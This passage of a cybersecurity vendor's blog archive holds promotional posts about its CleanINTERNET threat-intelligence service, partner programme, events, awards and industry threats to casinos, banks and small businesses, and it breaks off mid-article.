perimeter. Firewalls, whether traditional. next generation, on prem, or cloud (FWaaS) - are overwhelmed. A firewall is meant to act like a digital defensive perimeter fence around your company’s IT infrastructure. However, advanced threats often use malware variants capable of evading the firewall controls, allowing the threat actor to penetrate the network and access mission-critical data. Additionally, they cannot keep up with the vast volumes of reconnaissance traffic coming into an organization, nor cope with the highly dynamic threat environment. Security teams are managing a deluge of events via their SIEM, and struggle with an inability to act effectively and efficiently. Alert fatigue occurs when cybersecurity professionals are inundated with a high volume of alerts, many of which are false positives or low-priority events. This can result in analysts becoming desensitized to alerts, overlooking critical indicators of compromise, and ultimately missing potential security incidents. One of the main contributors to alert fatigue is the overwhelmed firewall. Traditional firewall solutions are designed to inspect network traffic and enforce security policies, but they struggle to keep pace with the scale and sophistication of modern cyber threats. As a result, firewalls generate an overwhelming number of alerts, often inundating security teams with irrelevant or redundant information. Cybersecurity and information security professionals need to ask themselves, are the firewalls I have in place fit for purpose? Can they keep my organization safe? Do I have a multi-layered approach to my cybersecurity posture? How many logs and events am I recording daily? Are my employees aware of and trained when it comes to malicious traffic entering my organization? At Centripetal our advice is to have a layered security strategy. The most effective network layer approach is an intelligence-based defense or what we call intelligence powered cybersecurity. We partner with many firms that already have enterprise class firewalls, where our CleanINTERNET (R) service enhances internet threat protection and sits in front of the firewall. The results? Reduced firewall logs and SIEM ingested events requiring human review by 90%-95% Identified and mitigated DDoS type scans and reflection attacks Blocked spam, VoIP fraud, remote access fraud, targeted phishing, malvertising, and intrusion attempts on public-facing services (RDP, eCommerce, web apps, FTP, Telnet/SSH). Shielded against latest phishing link clicks from internal assets Discovery of previously embedded Advanced Threats including infected assets (printers, laptops, UPS) and the discovery of unknown IoT, BYOD and other assets Identified and blocked external reconnaissance of IoT assets (HVAC Smart Panels) Identified shadow IT assets actively under attack   For more information contact sales@centripetal.ai or request a demo here. 1 Average time to compromise network - https://www.crowdstrike.com/press-releases/crowdstrike-releases-2023-threat-hunting-report/ --- ### [Empowering Partners: Unveiling Our New Partner Portal](https://www.centripetal.ai/blog/unveiling-our-new-partner-portal) Published: 2023-12-12 Summary: Welcome to a new era of collaboration! Our new Partner Portal is designed to be the central hub for our channel community. As you might have heard we recently announced our Global Partner Program. (hold for applause) After talking with our partners at length one thing became clear - there was a strong need for a central hub so they can learn, share and collaborate in an effective way. We listened and we delivered. Welcome to a new era of collaboration! We’re thrilled to bring you our brand new Partner Portal. Rooted in our commitment to our partners, this portal is designed to be the central hub for the channel community. So, what’s inside you ask? By utilizing the Partner Portal you will get access to: Resource Library: A comprehensive repository of industry reports, case studies, and market insights. Stay informed about the latest trends and developments to make  Upcoming Features: A sneak peek into future functionalities we're developing to further enhance your partnership experience. When we set out to create our Global Partner Program we knew we couldn’t do it alone and had to bring along the best in the business. That’s why we teamed up with Channel Mechanics to develop and deliver an innovative partner portal enabling us to leverage their proven track record of excellence in creating user-friendly and scalable solutions. Working closely with the team and their technology, aligns seamlessly with our commitment to providing an unparalleled experience for our partners.  Jeremy Butt, Channel Mechanics’ CRO told us that “collaborating with Centripetal to launch their Partner Portal has been an absolute pleasure. Their commitment to prioritizing seamless engagement for their rapidly expanding partner community is a breath of fresh air. We look forward to continuing to grow out their new Global Program in 2024 as their partner ecosystem grows.” Here’s what you can expect from us: Intelligence: Unleashing Knowledge In our ever-evolving industry, staying ahead of the curve is crucial. Our Partner Portal is a gateway to a wealth of knowledge, industry insights, and resources. You’ll be able to dive into a repository of curated content, from thought leadership articles to white papers, arming you with the intelligence needed to navigate the fast-paced landscape with your customers and prospects.  Experience: Elevating Collaboration Collaboration is the heart of our Partner Program. With the Partner Portal, we aim to enhance your experience by providing an easy-to-use platform for communication and interaction. As an extension of our channel partners team, the portal will share best practices, and provide the opportunity for you to engage in discussions that elevate your expertise in strengthening your customers' security posture. Exponential Growth: Your Success is Our Priority The Partner Portal is not just a tool; it's a commitment to the success and growth of you. We’re just starting - our promise is that we will continue to add valuable content for you to learn from. We have exciting plans to roll out additional features and functionalities as our Partner Program continues to flourish. This portal is a living testament to our dedication to providing you with valuable tools and resources necessary for exponential growth. Dave Silke, MD of Centripetal Ireland shared, “We believe that true partnership goes beyond transactions; it's about shared values, growth, and mutual success. The Partner Portal is our way of strengthening this bond. Explore, engage, and get ready for a journey of intelligence, experience, and exponential growth”. Your feedback matters - be a part of shaping the evolution of the Partner Portal and let us know what you think and what you would like to see. Share with us at partners@centripetal.ai. --- ### [Ushering in a New Era in Proactive Cybersecurity](https://www.centripetal.ai/blog/global-partner-program) Published: 2023-11-14 Summary: We have officially launched our Global Partner Program, empowering partners to proactively leverage threat intelligence for unparalleled protection. In the ever-evolving landscape of cybersecurity, staying ahead of the game is crucial. With the rise of cyber threats, organizations worldwide are seeking comprehensive protection against malicious actors. In light of this we have officially launched our Global Partner Program, empowering partners to proactively leverage threat intelligence for unparalleled protection. Our groundbreaking technology has already made waves, with over 30 Managed Service Providers (MSPs), resellers, and technology partners in the US and EMEA deploying their innovative solution. Our new Global Partner Program signifies a huge step forward, as organizations shift from a reactive to a proactive, modern cybersecurity defense. The program's aim is to elevate the way organizations address cybercrime, enhancing their security posture from the first line of defense to the last. By leveraging global threat intelligence and technical innovation, our partners can access actionable insights and a real-time view of threat analysis, empowering them to proactively tackle emerging security threats. Partners joining the Centripetal Global Partner Program can expect to benefit from the following: Intelligence- Leveraging the world's largest collection of global threat intelligence, experience firsthand cutting-edge intelligence-powered solutions that proactively protect networks and elevate the capabilities of existing security suites. Expertise - Our elite team of highly trained Intelligence Operations analysts will help every partner monitor, tune and shield their customers networks from malicious traffic, acting as an extension of an internal cybersecurity team. Exponential Growth - Our innovative approach to cyber defense helps significantly diminish customers' risk exposure. Partnering with Centripetal opens doors to revenue enhancement opportunities through both resale and value-added services. In a world where cybersecurity threats are constantly evolving, Our Global Partner Program is a beacon of hope, empowering organizations to take a proactive stance in safeguarding their digital assets and ensuring a secure future. Learn more, here. --- ### [A recipe for burnout? Survey shows over 90% of cybersecurity professionals work while on vacation](https://www.centripetal.ai/blog/over-90-percent-of-cybersecurity-professionals-work-on-vacation) Published: 2023-11-07 Summary: What compromises do cybersecurity professionals feel pressured to make in their work-life balance to keep their companies secure? Now that the calendar has flipped to November, the end of the year is in sight. It’s a popular time for friends and family to gather for the holidays, yet unfortunately, it’s also a popular time for cyber attackers to ramp up their exploits. Our thoughts turned to the cyber professionals on the front lines. What compromises do they feel pressured to make in their work-life balance to keep their companies secure? How often does their work actually impinge on their personal time?   To better understand the toll that cybersecurity takes on practitioners, Centripetal conducted a survey at InfoSec World 2023, and various cybersecurity events in the UK and Ireland. The goal was to discover how much personal time was lost - or to borrow a term from our own industry, compromised - and to understand the reasons behind it. The Results  While not surprising to anyone working in cyber, the results illustrate just how intrusive an always on security culture has become. Of the security professionals surveyed, 90% reported that they checked email, Slack and other forms of work communication when they were on vacation. Only 9% said that they never checked these communications. This reveals that even when employees are utilizing their legitimate right to time off work, they are unable to completely switch off from their job. Alarmingly, this problem is not just limited to the holidays or a summer vacation. Almost a third (32%) of the cybersecurity professionals we surveyed said their personal lives are interrupted by work every night. This number rises to 70% when asked if they are impacted at least once a week. The fact that so many employees find that their cybersecurity jobs regularly interfere with their personal lives implies a crisis of work-life balance in our industry. Every security professional surveyed works in their personal time - almost a fifth (18%) of security professionals are working over a full day’s worth of unpaid overtime (8+ hours) a week. What’s driving the long hours? Loyalty to the company is the reason why almost half (46%) of security professionals work these long hours. Just under a quarter (23%) said increased cyber threats were the reason. Another 16% said inadequate staffing, and one in ten claimed they were the only one who could do the job. What Can be Done?  Clearly, these results present not only a social problem but a security concern. We know that an appropriate work-life balance can reduce stress, improve emotional states, and increase overall employee productivity and satisfaction. It’s vital for companies to create a culture where employees can switch off without feeling guilty or under pressure.  It’s inspiring that the most significant reason cybersecurity professionals engage in out-of-hours work is because of loyalty to their company. Not only should companies work harder to encourage their employees’ work-life balance, they should also consider how to mitigate their workload.  One way to do this is to ensure that adequate tools and solutions are in place to offload more of the day-to-day security tasks. Automating or outsourcing tasks can give staff the confidence to truly switch off and take a well-earned break.  To learn more about how Centripetal can help your security staff achieve a better work- life balance, get in touch. --- ### [Empowering a Secure Digital Future with Centripetal Ireland During Cybersecurity Awareness Month](https://www.centripetal.ai/blog/cybersecurity-awareness-month-ireland) Published: 2023-11-03 Summary: For Cybersecurity Awareness month Centripetal Ireland office lead events to educate, inform and equip attendees to confront the ever-evolving challenges in cybersecurity. In today's digital world, the importance of cybersecurity is more critical than ever. With the constant evolution of cyber threats, safeguarding sensitive data and digital assets has transitioned from an option - to an absolute necessity. Each October, Cybersecurity Awareness Month focuses on the importance of cybersecurity in our interconnected world. For companies like ours, a steadfast commitment to cybersecurity awareness and education is not just a short-term focus; but a long-term strategy that can make the difference between being vulnerability or being resilient in the face of cyber threats. In celebration of the month, we hosted two events in our Galway office with goal of educating, informing and equipping attendees to confront the ever-evolving challenges in cybersecurity. Pathways to Cyber Students from diverse disciplines and academic years visited our EMEA headquarters at Platform 94 in Galway, Ireland, for insight into the personal journeys in cybersecurity shared by the panelists for an young professionals panel titled Pathways to Cyber. The panel included Brie Staunton, Threat Detection Engineer at Hewlett Packard Enterprise, Rebecca Springett, Customer Support Team Lead at TitanHQ, and John Owens, Marketing Executive at Centripetal. The event was a personal testament to the power of knowledge sharing. Providing personal anecdotes, invaluable insights and career guidance within cybersecurity, the panelists shared paths to opportunities in the industry. Cyber Threats in the West For professionals and cybersecurity enthusiasts in the business community who are eager to stay ahead of the dynamic threat landscape, Cyber Threats in the West: Trends in Cybersecurity, was also held at our EMEA headquarters in Galway, Ireland. Providing a platform for in-depth discussions on the latest cybersecurity trends, challenges, and best practices - our panel of experts included  David Silke, CMO and MD of Centripetal Europe, Fergal Lyons, Cybersecurity Evangelist at Centripetal, and Aileen Ward, Intelligence Operations Analyst at Centripetal. According to the Hiscox Cyber Readiness Report 2023, 70% of Irish firms have experienced a cyber-attack, underscoring the necessity of boosting cyber awareness and education throughout the country. Ward shared more insight into the report and key cyber threats currently facing Irish businesses, including phishing, social engineering, supply chain attacks, ransomware, insider threats, and vulnerabilities associated with remote work. She further highlighted the significant economic losses caused by cybercrime and the critical time it takes to identify and contain breaches, along with overall global cybersecurity challenges. Beyond threats, some of the key components in cybersecurity awareness for businesses include robust passwords, software patching, and compliance regulations. Lyons stressed the importance of staying up to date with cyber best practices, and educated on the concept of passkeys as a modern alternative to traditional passwords. He also highlighted the value of intelligence powered cybersecurity and its proactive nature that enables teams to pivot away from the traditional detect and respond methods. Educating on our CleanINTERNET® solution, he shared the pivotal roles of threat intelligence, network protection and cyber monitoring. In a month dedicated to raising awareness of the importance of cybersecurity, our Galway office enlightened and inspired students, professionals and enthusiasts alike - equipping attendees with tools to further navigate the ever-changing world of cyber. Learn more about intelligence powered cybersecurity, here. And for more information about our upcoming events, visit our events page here. --- ### [The Critical Cyber Threats That Are Targeting Casinos](https://www.centripetal.ai/blog/cyber-threats-targeting-casinos) Published: 2023-09-25 Summary: An FBI Cyber notification issued in Nov 2021 warned of an uptick in cyber threats targeting casinos, which have increased by 1000% since 2019. Every year casinos attract millions of players and billions of dollars via both physical venues and their associated online platforms. And the industry is estimated to grow by $11.42 billion between 2021 and 2025. Players trust casinos with both their funds and their personal data, so it is no surprise that threat actors are targeting these venues. Cyber criminals today are also targeting online gaming sites, where there is significant potential for fraud, website compromises and man-in-the-middle attacks.  In fact, gaming companies saw a 260% increase in online attacks from Q4 2021 to Q1 2022. The recent successful cyber attacks on MGM Resorts International and Caesars Entertainment resulted in the halting of gaming and hotel operations at properties nationwide. This cyber attack has cost the companies millions of dollars in revenue and adversely affect their reputation. Technology in the casino industry changes rapidly, giving hackers more opportunities to target systems via mobile payments, online games, third-party suppliers, and IoT devices.   A Ransomware Warning to Casinos Recently, 14 casinos across Canada were victims of a successful cyber attack that shut down operations. Russian state threat actors are suspected to be behind the many cyber attacks on casinos due to the Russia-Ukraine conflict. Successful cyber attacks on casinos have resulted not only in shutting down systems and but also have demanded ransoms in return, as well as the exfiltration of sensitive customer data to sell on the dark web. Cyber attacks on casinos are nothing new, especially in Las Vegas, the mecca of gambling. From 2014 to 2022 there were at least 10 attacks on Vegas casinos, leaving these organizations unable to fully operate until system restoration was complete, causing significant financial and reputational damage.   Online Gaming Under Attack Online casino customers need to have confidence in the application authentication process, and that their transactions are secure. Gaming platforms use multiple payment platforms and gateways to handle customer data, from PayPal and Skrill to traditional card-based payment networks like Visa and Mastercard. However, relying on these third-party solutions to access, hold, and process customer data puts casinos at a higher risk of being breached by malicious actors. In a 2022 report, 54% of businesses have suffered a data breach caused by a third party, and casinos need to ensure that business-critical data is secure throughout its lifecycle.   The Internet of Things Casinos use IoT technologies to help automate and streamline their customers’ experience.  This is achieved through wearable device gaming, smart lighting and cameras in venues, motion detectors, consumption tracking technology, trackable casino chips, and remote check-in and check-out. These devices are often targeted by hackers looking to infiltrate the casino as was the case for a North American casino in 2017. In this attack, cyber criminals managed to infiltrate the casino’s network by exploiting a vulnerability in the smart thermometer of an IoT-connected fish tank. Once inside, they accessed a database of high-roller customers and uploaded this data into the cloud.   Account Takeover Fraud Online gambling services are regularly targeted by Account Takeover (ATO) fraud. Malicious actors target personal information to withdraw remaining funds or unique loyalty benefits from the victim’s account. Beyond the direct costs, compensation fees, and hours of recovery time, ATO can damage brands permanently by destroying the trust and loyalty of customers. Identify, Notify, and Shield Cybersecurity solutions for casinos should provide a superior level of protection against incoming threats without hindering business activities or negatively impacting customer experience. Centripetal’s CleanINTERNET® protects casino operations and proactively defends them against ransomware attacks, assuring gaming and entertainment organizations that their reputation, their customer data, and their partner data are all protected.  CleanINTERNET® is an intelligence-powered security solution using high performance computing technology, patented software algorithms and uniquely skilled security analysts to deliver a robust alternative protection strategy at significantly lower cost. CleanINTERNET® presents an alternative approach to cybersecurity, putting threat intelligence at the forefront, moving from reactive to proactive defense, and helping security teams be more efficient and effective. Chat with our team today to proactively protect your casino. Get in touch. --- ### [Bridging the Cyber Skills Gap for Small Businesses](https://www.centripetal.ai/blog/bridging-the-cyber-skills-gap-for-small-businesses) Published: 2023-09-01 Summary: The rapid shift to remote or hybrid work, and subsequent adoption of cloud applications, has expanded small businesses' threat landscape. Small and Medium Enterprises (SMEs) have encountered increasing burdens over the last few years, from challenging economic conditions to a dramatically evolving cyber threat landscape. Today, 43% of cyber attacks are targeted at SMEs, and only 14% of targeted SMEs were prepared to handle such attacks. An astonishing 75% of those SMEs attacked could result in permanent closure if unable to recover data. Overall, small businesses are three times more likely than larger companies to be targeted by cybercriminals. Many of these challenges are a result of a lack of qualified cybersecurity professionals. Why is there a cyber skills gap? Today, the gap between the number of cyber security jobs in the US and the number of workers available to fill them is 466,225. And its estimated that only 3% of graduates are skilled in cyber security, equating to approximately 59,000 that could enter the cyber security workforce. This falls well short of meeting the demand. Why is the gap so large? A lack of formal and informal training Although many universities, colleges, and trade schools have introduced cyber security curriculums in the past few years, the number of graduates is not keeping pace with demand. While organizations are willing to facilitate training programs, this requires revenue and time that small businesses might not have the budget for. And over half of the organizations that have implemented training programs believe their employees still lack vital knowledge. Wage and funding issues Recent economic conditions have squeezed the budgets of small businesses. These shrinking funds have made it difficult to afford cybersecurity hiring and training. As a result, SMEs cannot keep up with salary expectations that larger organizations can afford. As a result, many are leaving for higher pay and SMEs continue to struggle to attract talent and retain talent. Stress and burnout Around half of all cybersecurity professionals experience extreme stress or burnout, with 56% saying that their role has become more stressful each year. In addition, 54% reported a negative impact on mental health. Due to the stress of growing workloads, many cyber security professionals are leaving the field altogether – making the talent pool smaller and more difficult for SMEs to find skilled resources. The impact of the cyber skills gap  When organizations do not have the qualified cyber professionals they need, they are more vulnerable to cyberattacks. 80% of data breaches are caused by lack of cyber security and 52% of organizations question their current cyber security awareness programs. These breaches can be a direct result of firewall misconfiguration, poor data storage, or a failure to detect and react to security incidents - all issues that could be avoided with fully-trained and fully-formed cybersecurity teams. Additionally, only a third of businesses were found to have more advanced cybersecurity skills like forensic analysis and penetration testing. Research by (ISC)² revealed that in order to effectively protect their networks against a growing array of cyber attacks, the global cybersecurity workforce needs to grow by around 65%. Small businesses can invest in firewalls, VPNs, and threat detection solutions to bolster cybersecurity, but technology is only as effective as those who use it. And security solutions must be managed by those who understand them and can use them correctly. So why are breaches still occurring? Findings from a 2022 cyber security benchmarking survey by ThoughtLab, indicate that attacks will primarily be caused by software misconfigurations (49%), human error (40%), poor maintenance (40%), and unknown assets (30%). This is due to the lack of internal resources that are needed to perform necessary cyber security hygiene, regardless of the complexity of the security stack. How small businesses can overcome the cyber skills gap At Centripetal, we employ a team of highly trained analysts to act as an extension of your overburdened team. With experience securing sensitive networks at the NSA and the CIA, our cyber threat analyst team delivers the skills you need to realize your cybersecurity initiatives. Our service, CleanINTERNET® aggregates over 3,500 cyber threat feeds to proactively shield against 99% of known cyber threats. SME's can now have enterprise-class cyber threat visibility while saving time and money on complex cyber threat feeds. With CleanINTERNET®, the responsibility of threat hunting, detection, and remediation no longer falls solely on your security staff. CleanINTERNET® secures your business and saves you money by delivering threat monitoring, reducing false positives, minimizing log storage demands, and mitigating the need to recruit and retain expensive staff. Learn more about CleanINTERNET® by contacting our team today. --- ### [CleanINTERNET® Protects Customers from MOVEit Vulnerability](https://www.centripetal.ai/blog/cleaninternet-protects-customers-from-moveit-vulnerability) Published: 2023-06-12 Summary: Centripetal observed and blocked over 300 clear attempts at exploiting the MOVEit vulnerability in our customer networks.  In early June, multiple threat researchers observed attacks on MOVEit servers using a zero day vulnerability that facilitated data exfiltration. MOVEit Transfer is a managed file transfer software that supports the exchange of files and data. This vulnerability allows an attacker to gain access to the database and possibly infer information about the structure and contents of the database. Over subsequent days the media covered many examples of enterprises being significantly impacted by attackers targeting this vulnerability making it clear that it was being widely exploited.  Zellis, a large UK payroll provider announced that they had been compromised by this attack and that hackers had gained access to personal and payroll information on employees of British Airways, BBC, Boots, Aer Lingus and others.   Centripetal tracked a range of indicators of compromises (IOCs) associated with the vulnerability and proactively deployed them directly to all customers for immediate shielding. We are constantly updating our intelligence as our providers publish new intelligence to their respective feeds. Over the subsequent week we observed over 300 clear attempts at exploiting this vulnerability in our customer networks and monitored 6,000 connections potentially associated with MOVEit.  Centripetal blocked potential attacks which could have significantly impacted their business. CleanINTERNET® customers were protected from attack because of Centripetal's access to timely and relevant threat intelligence related to this vulnerability and associated attack infrastructure, and because we pushed that intel down to all customer's RuleGATEs in near real-time.  This approach to protection ensures a rapid defense without placing a significant burden on the customer. Our recommendation is still that all customers of MOVEit should patch their infrastructure as soon as practical, thus mitigating all concerns around this vulnerability.  In the meantime CleanINTERNET® provides a defensive layer to shield malicious traffic targeting this and other vulnerabilities. If you are a current client of MOVEit or you use their services, please contact us to learn more about how CleanINTERNET® can protect you. --- ### [Harnessing Intelligence Powered Cybersecurity in the Cloud](https://www.centripetal.ai/blog/introducing-cleaninternet-cloud) Published: 2023-05-30 Summary: We are expanding our CleanINTERNET® service to the cloud with CleanINTERNET® CLOUD for AWS, Azure and Google Cloud. As businesses increasingly embrace cloud computing to enhance their operations, the need for robust cybersecurity measures becomes paramount. Traditional cybersecurity approaches often fall short in protecting cloud environments against ever-evolving cyber threats. This is why today we are excited to announce that we are expanding our CleanINTERNET® service to the cloud. CleanINTERNET® CLOUD is a revolutionary approach to defending organizations from cyber threats by leveraging dynamic threat intelligence from more than 250 threat intelligence providers in real-time, proactively shielding networks from 99% of known threats.  The cloud, with its scalability, flexibility, and cost-efficiency, has become an integral part of modern business infrastructure. However, it also presents unique security challenges, as organizations must secure not only their on-premises systems but also their cloud-based assets. Any server deployed in the cloud is a potential target for hackers. A recent study found that 81% of organizations have experienced a cloud-related security incident in 2022, and the average cost of a data breach has reached a record high of $4.35 million in the United States. Therefore cybersecurity concerns need to be top of mind for all cloud based initiatives.  CleanINTERNET® CLOUD represents a significant advancement in protecting our customers’ digital assets from evolving cyber threats, removing the need for more costly cybersecurity infrastructure. Key benefits include: Protection across all enterprise assets via cloud centric security solution Achieve immediate risk reduction with rapid, flexible and scalable deployment Address ongoing skills shortages by leveraging outsourced threat monitoring by our highly trained senior Intelligence Operations Analysts Control security costs and complexity by availing of highly effective intelligence powered defense As businesses increasingly embrace cloud computing, the adoption of intelligence-powered cybersecurity becomes essential for maintaining a strong security posture. By investing in these cutting-edge solutions like CleanINTERNET® CLOUD, organizations can strengthen their resilience, enhance threat detection and prevention capabilities, and ensure the secure and uninterrupted operation of their cloud-based systems. CleanINTERNET® CLOUD is currently available on Amazon Web Services now, and will be arriving on Microsoft Azure and the Google Cloud Platform in fall 2023. Learn more here. --- ### [We’re Having the Craic](https://www.centripetal.ai/blog/european-cyber-intelligence-centre-of-excellence) Published: 2023-05-29 Summary: We are creating new opportunities in Ireland and the UK with the launch of our European Cyber Intelligence Centre of Excellence. In an increasingly digital world, the importance of robust cybersecurity measures cannot be overstated. As cyber threats continue to evolve and grow in sophistication, nations worldwide are stepping up their efforts to safeguard their digital infrastructure and protect their citizens, businesses, and institutions. Today we are taking a significant stride in addressing the ever evolving cyber threats by creating new opportunities in Ireland and the UK with the launch of our European Cyber Intelligence Centre of Excellence.  Our Centre of Excellence will serve as the central hub for new and existing customers to work with us to gain insight on the current European and global threat landscape, and to better understand how they might be affected. Additionally, customers will have access to our global intelligence operations analyst team, who continuously analyze emerging threats - highlighting critical risks and applying global threat intelligence.  The Government of Ireland, through the IDA, has played a pivotal role in fostering an environment conducive to cybersecurity innovation. By providing support to companies like Centripetal, Ireland is actively promoting the development and growth of the cybersecurity industry. The collaboration between IDA Ireland and Centripetal will bring 50 cybersecurity jobs to Galway, which showcases the government's commitment to leveraging expertise and creating valuable employment opportunities within the country. According to the International Trade Administration, the cybersecurity market in Ireland is thriving, valued at €280 million. However, with economic crime and fraud on the rise in recent years, cybercrime is extremely disruptive in its impact on the business community. Grant Thornton Ireland reports that the cost of cybercrime in Ireland exceeded €9.6 billion in 2020. With the opening of the European Cyber Intelligence Centre of Excellence in Galway, we are bringing our innovative, patented technologies to the European market to protect organizations from every known cyber threat. As cyber threats continue to evolve, everyone at Centripetal remains committed to staying at the forefront of global intelligence powered cybersecurity initiatives across Ireland and the UK. This will be achieved by investing in the country’s talent development, R&D, and strategic collaboration with Ireland IDA to further help shape the future of intelligence powered cybersecurity. Interested in learning more? You can find us here. --- ### [Celebrating Innovation for a Safer Digital World](https://www.centripetal.ai/blog/celebrating-innovation-for-a-safer-digital-world) Published: 2023-04-24 Today marks the start of RSA 2023 and there’s no better way to kick it off than by announcing that we are the proud recipients of the Cybersecurity Visionary award from Cyber Defense Magazine (CDM), the industry’s leading information security magazine. We knew the competition would be tough with top judges who are leading information securing experts from around the globe, so this is a true honor for us.  This award celebrates our forward-thinking mindset, innovative strategies, and unwavering commitment to creating a more secure digital world. Winning the cybersecurity visionary award indicates that we have demonstrated a unique ability to operationalize the world’s largest collection of threat intelligence in real-time, build innovative patented technologies, and provide thought leadership in the cybersecurity industry. This recognition is a testament to our expertise and dedication to building a secure digital world by neutralizing cyberthreats, and serves as an inspiration to others to continue pushing the boundaries of cybersecurity. “Centripetal embodies the three major features the CDM judges look for to become winners: understanding tomorrow’s threats, today, providing a cost-effective solution and innovating in unexpected ways that can help mitigate cyber risk and get one step ahead of the next breach,” said Gary S. Miliefsky, Publisher of Cyber Defense Magazine. This is Cyber Defense Magazine’s tenth year of honoring InfoSec innovators from around the Globe. We’re thrilled to be a member of this coveted group of winners. Please join us at the #RSAC RSA Conference 2023, today, as we share our red carpet experience and proudly display our trophy on LinkedIn and Twitter. --- ### [And The Award Goes To…](https://www.centripetal.ai/blog/cybersecurity-excellence-awards) Published: 2023-03-07 Summary: We are honored to be named a Silver Winner in the Cybersecurity Excellence Awards for the Most Innovative Cybersecurity Company and for Products and Services in the Threat Detection, Intelligence and… Since 2009 we have been innovating and creating the best and most innovative cybersecurity technologies for our customers. This hard work pays off every day when we talk with our customers and others in the industry, about the strength of their security posture with CleanINTERNET®. We also appreciate when our company and technology is validated by third parties. That’s why we are honored to be named a Silver Winner in the Cybersecurity Excellence Awards for the Most Innovative Cybersecurity Company and for Products and Services in the Threat Detection, Intelligence and Response category for CleanINTERNET®.  The 2023 Cybersecurity Excellence Awards recognize companies, products and professionals that demonstrate excellence, innovation and leadership in Information Security. The winners have been selected based on both the strength of their nomination, as well as the popular vote by members of the Information Security Community. “We congratulate Centripetal for the recognition as an award winner in the Most Innovative Cybersecurity Company and Products & Services in the Threat Detection, Intelligence and Response category of the 2023 Cybersecurity Excellence Awards,” said Holger Schulze, CEO of Cybersecurity Insiders and founder of the 600,000-member Information Security Community on LinkedIn, which organizes the 8th annual Cybersecurity Excellence Awards. “With over 800 entries in more than 300 award categories, the 2023 Cybersecurity Excellence Awards program is highly competitive. All winners reflect the very best in innovation and excellence in defending against today's evolving cybersecurity threats.” We couldn’t have done this without the support of our amazing customers and partners. Here’s to many more years of working together and providing the world with a secure internet. --- ### [The Power of Innovation in Business](https://www.centripetal.ai/blog/the-power-of-innovation-in-business) Published: 2023-01-13 Summary: Innovation doesn’t just transform businesses, but entire industries - creating new markets, solving complex problems that disrupt the status quo and drive the growth of society. Since the conception of mankind, our world has thrived on innovation. It solves problems and drives progress, moving our world forward generation after generation. Innovation has led to the development of new technologies, products, and services that solve problems and meet the needs of people in ways that were previously not possible. From the wheel and the printing press to electricity, cars, computers and the internet - it’s hard to imagine a world without these inventions. And, as a competitive advantage for businesses and organizations, innovation allows them to differentiate themselves from their competitors and stay ahead of the curve.  With Innovation, Comes Disruption With a passion for innovation and entrepreneurship engrained in Centripetal, we are launching Innovation Friday’s to support and recognize entrepreneurs and businesses that innovate, educate on the challenges faced, and inform on the changing landscape of innovation policy.   Howard Schultz, longtime Chairman and Chief Executive Officer of Starbucks says, “Innovation must be disruptive. And by disruptive, I mean disruptive. You gotta fracture and break the rules and disrupt.” At Centripetal, we pride ourselves on being experts in innovation, empowering growth and opportunity for small businesses who are disrupting legacy technologies. Our founder, Stephen Rogers, was responsible for securing AirForce One, the United States satellite systems and eventually commercial satellites, deploying the first encrypted commercial satellite communication system. Simply put - he has disrupted traditional technology methods by taking intelligence and integrating it with communication security in networks to prevent adversaries from gaining access. Today, the drive to innovate is found throughout our company in our employees and our solutions. The Impact on the World Innovation doesn’t just transform businesses, but entire industries - creating new markets, solving complex problems that disrupt the status quo and drive the growth of society. The value of innovation can be seen through: Economic growth, leading to the development of new industries and the growth of existing ones, which can drive economic development and create jobs. Improved efficiency, leading to more efficient processes, which can save time and resources, and increase competition Increased competition, companies that innovate are often able to differentiate themselves from their competitors and gain a competitive advantage. Disruptive innovations can make it easier for new entrants and challenge established players - leading to lower prices and better products and services. Better products and services, resulting in the development of better, more advanced products and services that meet the needs and preferences of consumers, and make their lives more convenient.  Innovation plays a critical role in driving progress, and improving the way we live and work to shape the future.  We look forward to telling these stories. Watch more here. --- ### [How Banks Around the World Can Prevent Cyber Attacks](https://www.centripetal.ai/blog/how-banks-can-prevent-cyber-attacks) Published: 2022-10-28 Summary: In 2021, the banking industry reported 703 cyberattack attempts per week — a 53% increase from 2020. What are the main vectors of attack? As both consumer and commercial banking clients shift to primarily utilize online banking, they still have high expectations that their financial assets will be secure. In 2021, the banking industry reported 703 cyberattack attempts per week — a 53% increase from 2020. And the cost of cyberattacks in the industry has reached $18.3 million annually per breach. Security has never been more important to ensure that your customers’ financial data is both inaccessible to fraud yet accessible to the right people. What are the main vectors of attack, and how can you protect against these?   1. Supply chain vulnerabilities Cyber criminals often target a specific vendor or software provider by offering your customers or supply chain partners malicious products or updates. Once they’ve successfully compromised distribution systems, malicious actors then enter supplier’s customers’ networks, allowing breaches to further spread. But, distribution channels within supply chains aren’t the only area vulnerable to exploitation. Threat actors often access customer assets by exploiting your partners’ vulnerabilities. In 2020, the New Zealand Stock Exchange suffered from an extended distributed denial of service (DDoS) attack on a network provider. The stock exchange was forced to halt trading for two days. Before you contract with a third-party partner, it’s important to evaluate their security structure to make sure they are not a security risk. Review all vendor and partner relationships and networks for vulnerabilities, and mitigate supply chain risk by implementing a Zero Trust network architecture.   2. Employees and social engineering It may be hard to believe, but employees are the most vulnerable point in your security chain, with human error accounting for over 90% of security breaches. Though rarely malicious, many employees are uninformed or aren’t trained in security awareness. This means they are attractive targets to social engineering attackers. Why? It’s often easier to take advantage of people than a network or software. Common social engineering techniques can include baiting, phishing, whaling, scareware, old-fashioned dumpster diving, and on-premise theft. Using these approaches, employees can be tricked into handing over sensitive details and credentials such as personally identifiable information (PII), or unintentionally downloading malware. It is imperative to educate staff through frequent security awareness training, and to keep your employees informed about ever-evolving social engineering tactics and security best practices. In doing so, you can prime your employees to act as the first line of defense against attacks, reducing cyber risk and decreasing the loss of PII, revenue, and brand reputation.   3. Mobile devices and apps As the world shifts to mobile and online banking, banks are faced with a new set of challenges. Issues you must contend with range from a lack of server security, insecure or ineffective data storage, data leakage, and even ransomware installation. When the Ecuadorian Pichincha Bank was hit by a cyber attack in 2021, their ATMs and online banking were rendered inoperable. The bank was forced to shut down portions of their network to prevent the attack’s spread. Your customers expect round-the-clock mobile access to their accounts. Strong mobile security systems can help you provide that. Having these systems in place can help you avoid a breach requiring you to shut down your services, causing disruption and reputational damage. Mitigating risk requires an understanding of who every user is and where they are coming from. This proactive, Zero-Trust or ‘least privilege access’ approach challenges the user to prove they’re not an attacker. Methods like multi-factor authentication (MFA) and encryption can stop attackers before any intrusion occurs.   4. Ransomware The abundance of sensitive data held by your bank, including customers’ Social Security numbers (SSN), banking details, and PII, make you an attractive target for ransomware attacks. Ransomware can cripple systems and expose customers' data, and malicious actors expect banks to pay inflated ransoms to recover sensitive data and avoid costly downtime. In 2021, vulnerabilities in a file-sharing server used by Flagstar Bank were 